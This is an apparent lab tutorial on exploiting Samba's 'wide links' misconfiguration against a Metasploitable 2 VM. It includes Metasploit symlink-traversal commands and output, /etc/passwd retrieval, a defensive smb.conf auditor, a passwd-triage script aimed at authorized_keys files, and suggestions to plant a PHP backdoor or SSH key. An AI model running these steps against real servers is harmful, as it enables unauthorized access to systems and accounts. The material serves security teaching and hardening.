Samba can be configured in a way that lets anyone with write access to a share reach the root of the server's file system. Once an attacker has that level of access, it is usually only a matter of time before the whole system is compromised. Although this configuration is not common in the wild, Metasploit makes it trivial to exploit.
Symbolic links, or symlinks, are files that point to other files or directories on a system, and they are an integral part of the Linux environment. Symlinks are often used to connect libraries and to redirect specific binaries to other versions.
File-sharing services such as Samba can use symbolic links to give users easy access to linked folders and files. Normally, however, links are only followed within the share itself, which prevents access to the underlying file system.
Samba has an option called wide links. When it is enabled, symbolic links that point outside the share's directory are followed, so the share no longer acts as a sandbox. This is a major security issue: any user with write access to the share can create a link to the root of the file system and then browse it through the share. Two things have to be true for the attack below to work. The share must be writable to the attacker (here, anonymously), and Samba must honor the SMB unix extensions so that the client can create the symlink over SMB in the first place. Metasploitable 2 ships Samba 3.0.20, which has both enabled by default. Since the fix for CVE-2010-0926 (Samba 3.3.11 / 3.4.6), wide links defaults to no and is silently ignored while unix extensions = yes, which is why this trick fails against a default modern Samba unless an administrator has explicitly turned unix extensions off and wide links on.
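To make the misconfiguration concrete, here is an added example that is not part of the original article: a small POSIX shell/awk auditor that reads an smb.conf and reports every share that is writable and can follow symlinks out of the share. It encodes the Samba option semantics described above (wide links inherited from [global], unix extensions disabling wide links on patched versions, the writable/read only synonyms). The two configuration files it checks are constructed samples modelled on Metasploitable 2 and on a hardened server; they are not the real files, and the "legacy" switch is this script's own way of selecting pre-3.4.6 defaults.

```sh
#!/bin/sh
# Added example (not from the original article): audit an smb.conf for the
# wide-links misconfiguration. A share is reported when it is writable AND
# symlinks can escape it (wide links effectively on).
#
# Samba semantics encoded here:
#   - "wide links" may be set in [global] (inherited by every share) or per share.
#   - "unix extensions" is global and defaults to yes. Since the CVE-2010-0926 fix
#     (Samba 3.3.11 / 3.4.6) a "yes" value forces "wide links" off, and "wide
#     links" itself defaults to no. Before that fix (e.g. Samba 3.0.20 on
#     Metasploitable 2) "wide links" defaulted to yes and was never forced off.
#   - "writable", "writeable", "write ok" and "read only" (inverted) are synonyms;
#     "public" is a synonym for "guest ok".
#
# Usage: audit_smb_conf FILE [legacy]   ("legacy" = pre-3.4.6 defaults)
audit_smb_conf() {
    awk -v legacy="${2:-}" '
    function norm(v) { v = tolower(v); gsub(/^[ \t]+|[ \t]+$/, "", v); return v }
    function yes(v)  { return (v == "yes" || v == "true" || v == "1") }
    # effective value of key for share s: share setting, else [global], else def
    function get(s, key, def) {
        if ((s, key) in opt)        return opt[s, key]
        if (("global", key) in opt) return opt["global", key]
        return def
    }
    /^[ \t]*[;#]/ || /^[ \t]*$/ { next }            # comments, blank lines
    /^[ \t]*\[.*\][ \t]*$/ {                         # [section] header
        sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/\][ \t]*$/, "", sec)
        sec = tolower(sec); order[++n] = sec; next
    }
    index($0, "=") {                                 # key = value
        i = index($0, "=")
        key = norm(substr($0, 1, i - 1)); val = norm(substr($0, i + 1))
        if (key == "writeable" || key == "write ok") key = "writable"
        if (key == "read only") { key = "writable"; val = yes(val) ? "no" : "yes" }
        if (key == "public") key = "guest ok"
        opt[sec, key] = val
    }
    END {
        unixext = get("global", "unix extensions", "yes")
        for (i = 1; i <= n; i++) {
            s = order[i]
            if (s == "global") continue
            wl = get(s, "wide links", legacy ? "yes" : "no")
            if (!legacy && yes(unixext)) wl = "no"   # patched Samba ignores wide links here
            if (yes(wl) && yes(get(s, "writable", "no")))
                printf "VULN share=%s guest_ok=%s\n", s, get(s, "guest ok", "no")
        }
    }' "$1"
}

# Constructed sample modelled on Metasploitable 2 (not its real smb.conf).
vulnerable_conf() {
cat <<'EOF'
[global]
   workgroup = WORKGROUP
   server string = metasploitable server
   security = share
   unix extensions = yes
   wide links = yes
[tmp]
   comment = oh noes!
   path = /tmp
   writable = yes
   public = yes
[opt]
   path = /opt
   read only = yes
EOF
}

# The fix: turn wide links off (on a patched Samba, leaving unix extensions on
# already does that). "follow symlinks = no" additionally stops the share from
# following any symlink at all; the auditor above does not evaluate it.
hardened_conf() {
cat <<'EOF'
[global]
   workgroup = WORKGROUP
   unix extensions = yes
   wide links = no
[tmp]
   path = /tmp
   writable = yes
   guest ok = yes
   follow symlinks = no
EOF
}

d=$(mktemp -d)
vulnerable_conf > "$d/vuln.conf"; hardened_conf > "$d/fixed.conf"
echo "# Samba 3.0.x semantics (Metasploitable 2):"; audit_smb_conf "$d/vuln.conf" legacy
echo "# same file on patched Samba (unix extensions = yes disables wide links):"; audit_smb_conf "$d/vuln.conf"
echo "# hardened file, even with legacy defaults:"; audit_smb_conf "$d/fixed.conf" legacy
rm -rf "$d"
```

Run against the constructed Metasploitable-style file with legacy defaults, the auditor flags tmp (writable, guest-accessible, wide links on) and ignores opt (read only). The same file evaluated with post-fix semantics produces nothing, because unix extensions = yes overrides wide links on a patched server; that is exactly the caveat that makes this attack version-dependent. Point it at a real /etc/samba/smb.conf to check a server you administer.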
For this demonstration, we use Kali Linux to attack a Metasploitable 2 virtual machine. If you have a similar pentesting lab, you can follow along.
Step 1: Create the Link with Metasploit
After we have determined that the SMB service is running on the target, we first check whether we can access any shares and, if so, find their names. We can use smbclient for this:
~# smbclient -L //10.10.0.50/
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE
We can see above that we can log in anonymously and list the shares. Most of them look like default shares, but the one called tmp stands out, and its comment "oh noes!" is a strong hint that it is the intended target. We will use it as our target share.
Next, start Metasploit by typing msfconsole in the terminal.
~# msfconsole
[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***

(banner art omitted)

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >
Once the banner has finished loading and we are at the prompt, we can look for a suitable module with the search command:
msf5 > search samba symlink

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                            normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                  normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                                normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                               normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                   normal     Yes    List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                  normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   auxiliary/server/wget_symlink_file_write              2014-10-27       normal     No     GNU Wget FTP Symlink Arbitrary Filesystem Access
   7   exploit/freebsd/samba/trans2open                      2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   8   exploit/linux/local/abrt_raceabrt_priv_esc            2015-04-14       excellent  Yes    ABRT raceabrt Privilege Escalation
   9   exploit/linux/local/asan_suid_executable_priv_esc     2016-02-17       excellent  Yes    AddressSanitizer (ASan) SUID Executable Privilege Escalation
   10  exploit/linux/samba/chain_reply                       2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   11  exploit/linux/samba/is_known_pipename                 2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   12  exploit/linux/samba/lsa_transnames_heap               2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   13  exploit/linux/samba/setinfopolicy_heap                2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   14  exploit/linux/samba/trans2open                        2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   15  exploit/multi/samba/nttrans                           2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   16  exploit/multi/samba/usermap_script                    2007-05-14       excellent  No     Samba "username map script" Command Execution
   17  exploit/osx/samba/lsa_transnames_heap                 2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/trans2open                          2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   19  exploit/solaris/samba/lsa_transnames_heap             2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  exploit/solaris/samba/trans2open                      2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   21  exploit/unix/http/quest_kace_systems_management_rce   2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   22  exploit/unix/misc/distcc_exec                         2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   23  exploit/unix/webapp/citrix_access_gateway_exec        2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   24  exploit/windows/fileformat/ms14_060_sandworm          2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   25  exploit/windows/http/sambar6_search_results           2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   26  exploit/windows/license/calicclnt_getconfig           2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   27  exploit/windows/local/ms13_097_ie_registry_symlink    2013-12-10       great      No     MS13-097 Registry Symlink IE Sandbox Escape
   28  exploit/windows/smb/group_policy_startup              2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   29  post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations
This search term returns a lot of results, but the one we want is actually the first one. Load the module with the use command followed by the module's path:
msf5 > use auxiliary/admin/smb/samba_symlink_traversal
Now that we are in the module's context, the options command displays its settings:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem
Port 445 is already set as the SMB port, and the name of the directory to create, which will be linked to the root file system, defaults to rootfs. We only need to set RHOSTS to the IP address of the target:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
And the name of the share we want to write to, in this case tmp:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
Now we should be all set. Enter run at the prompt to start the module:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run

[*] Running module against 10.10.0.50
[*] 10.10.0.50:445 - Connecting to the server...
[*] 10.10.0.50:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.0.50:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.0.50:445 - Now access the following share to browse the root filesystem:
[*] 10.10.0.50:445 -    \\10.10.0.50\tmp\rootfs\
[*] Auxiliary module execution completed
The output describes what the module does as it runs: it first connects to the server and mounts the writable share we specified. It then creates a symbolic link named rootfs inside that share (using the SMB unix extensions, pointing far enough up the directory tree to land at /) and tells us the path through which to reach it. Perfect.
Once the module has done its job, we can leave Metasploit with the exit command and use smbclient to connect to the target share:
msf5 > exit
~# smbclient //10.10.0.50/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "Help" for a list of possible commands.
We can log in anonymously again and use the ls command to see the contents of the share:
smb: \> ls
  .                                   D        0  Wed Aug  8 10:52:28 2018
  ..                                 DR        0  Sun May 20 13:36:12 2012
  4600.jsvc_up                        R        0  Wed Aug  8 08:57:48 2018
  .ICE-unix                          DH        0  Wed Aug  8 08:56:05 2018
  .X11-unix                          DH        0  Wed Aug  8 08:56:51 2018
  .X0-lock                           HR       11  Wed Aug  8 08:56:51 2018
  rootfs                             DR        0  Sun May 20 13:36:12 2012

                7282168 blocks of size 1024. 5430648 blocks available
Here we see the new rootfs directory created by the Metasploit module. It is actually a symbolic link, but we can enter it like a normal directory. Let's do that and see what's inside:
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  mnt                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  bin                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Wed Aug  8 08:55:30 2018
  root                               DR        0  Wed Aug  8 08:56:51 2018
  sys                                DR        0  Wed Aug  8 08:55:31 2018
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R    20962  Wed Aug  8 08:56:51 2018
  etc                                DR        0  Wed Aug  8 08:56:23 2018
  dev                                DR        0  Wed Aug  8 08:56:06 2018
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Wed Aug  8 10:52:28 2018
  srv                                DR        0  Tue Mar 16 17:57:38 2010

                7282168 blocks of size 1024. 5430648 blocks available
And there we have it: access to the root file system. We can now do things like read /etc/passwd, although smbclient cannot display a file directly. Instead, change into the etc directory and download the file to our machine with the get command:
smb: \rootfs\> cd etc
smb: \rootfs\etc\> get passwd
getting file \rootfs\etc\passwd of size 1581 as passwd (128.7 KiloBytes/sec) (average 128.7 KiloBytes/sec)
Now we can see all users on the target, their home directories and their shells, all useful information for enumeration:
~# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
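The passwd listing above is more useful once it is turned into a target list. The following shell script is an added example, not part of the original article: it reads a passwd file (here a constructed subset of the listing above), drops accounts whose shell cannot log in, and classifies the rest as UID-0, regular-user or service-with-shell accounts. The authorized_keys path it prints is the conventional location under each home directory, an assumption rather than something passwd records; it is the file to try reading or writing through the rootfs link as the next step.

```sh
#!/bin/sh
# Added example (not from the original article): triage a passwd file that
# was pulled through the rootfs link. Accounts whose shell is nologin, false,
# sync or true cannot log in interactively and are dropped; the rest are classed as
#   uid0                UID 0, i.e. root-equivalent
#   user                regular accounts (UID 1000-59999, Debian's UID_MIN..UID_MAX)
#   service-with-shell  system accounts that nevertheless have a login shell
# The authorized_keys path is the conventional ~/.ssh location (an assumption;
# passwd does not record it). Through the share it becomes
# rootfs/<home>/.ssh/authorized_keys, the file to try reading or writing next.
triage_passwd() {
    awk -F: '
    $7 ~ /(nologin|false|sync|true)$/ { next }
    {
        if ($3 == 0)                        cls = "uid0"
        else if ($3 >= 1000 && $3 < 60000)  cls = "user"
        else                                cls = "service-with-shell"
        printf "%s uid=%s shell=%s class=%s authorized_keys=%s/.ssh/authorized_keys\n", $1, $3, $7, cls, $6
    }' "$1"
}

# Constructed input: a subset of the /etc/passwd listing shown above.
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
statd:x:114:65534::/var/lib/nfs:/bin/false
EOF
}

f=$(mktemp)
sample_passwd > "$f"
triage_passwd "$f"
rm -f "$f"
```

On the sample input this yields one UID-0 account (root), three regular users (msfadmin, user, service) and four system accounts that still carry a shell (daemon, www-data, nobody, postgres), while sshd, mysql and statd are dropped. Note that on this older Debian base /bin/sh is a real login shell for many system accounts, so shell alone is not a reliable "human user" test; that is why the script separates the classes by UID range. Whether any of the listed authorized_keys files can actually be read or written through the share still depends on the Unix permissions of the account the anonymous SMB login maps to.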
Other Attack Scenarios
Now that we have access to the root file system, there are several directions an attacker can take. It all depends on the attacker's imagination and the configuration of the target.
There is an important caveat here: although we can reach the root of the file system, we do not have root privileges. We only have the permissions of the account that the anonymous login to the tmp share maps to, typically an unprivileged guest user. Every read, write and directory listing through the link is subject to that account's Unix permissions, which limits what we can do. Depending on the server's configuration, however, a few things are worth trying.
For example, if that account has write access to the Apache web root, we can place a PHP backdoor there and open it in the browser to get a shell back to our machine. Another vector, if the permissions on a user's SSH configuration are loose enough, is to add our own public key to that user's authorized_keys file so that we can SSH into the box as that user.
As a hacker, it is imperative to be creative, even in situations where getting a shell seems impossible. With enough patience and creativity, it can usually be done.
Today we learned how to exploit wide links in Samba to access the root file system. After confirming that we had access to a writable SMB share, we used a Metasploit module to create a link pointing to the root directory of the server. We were then able to browse the root file system and consider some possible attack vectors. Recognizing how a simple misconfiguration like this can be turned into a foothold is a skill every white-hat hacker should have.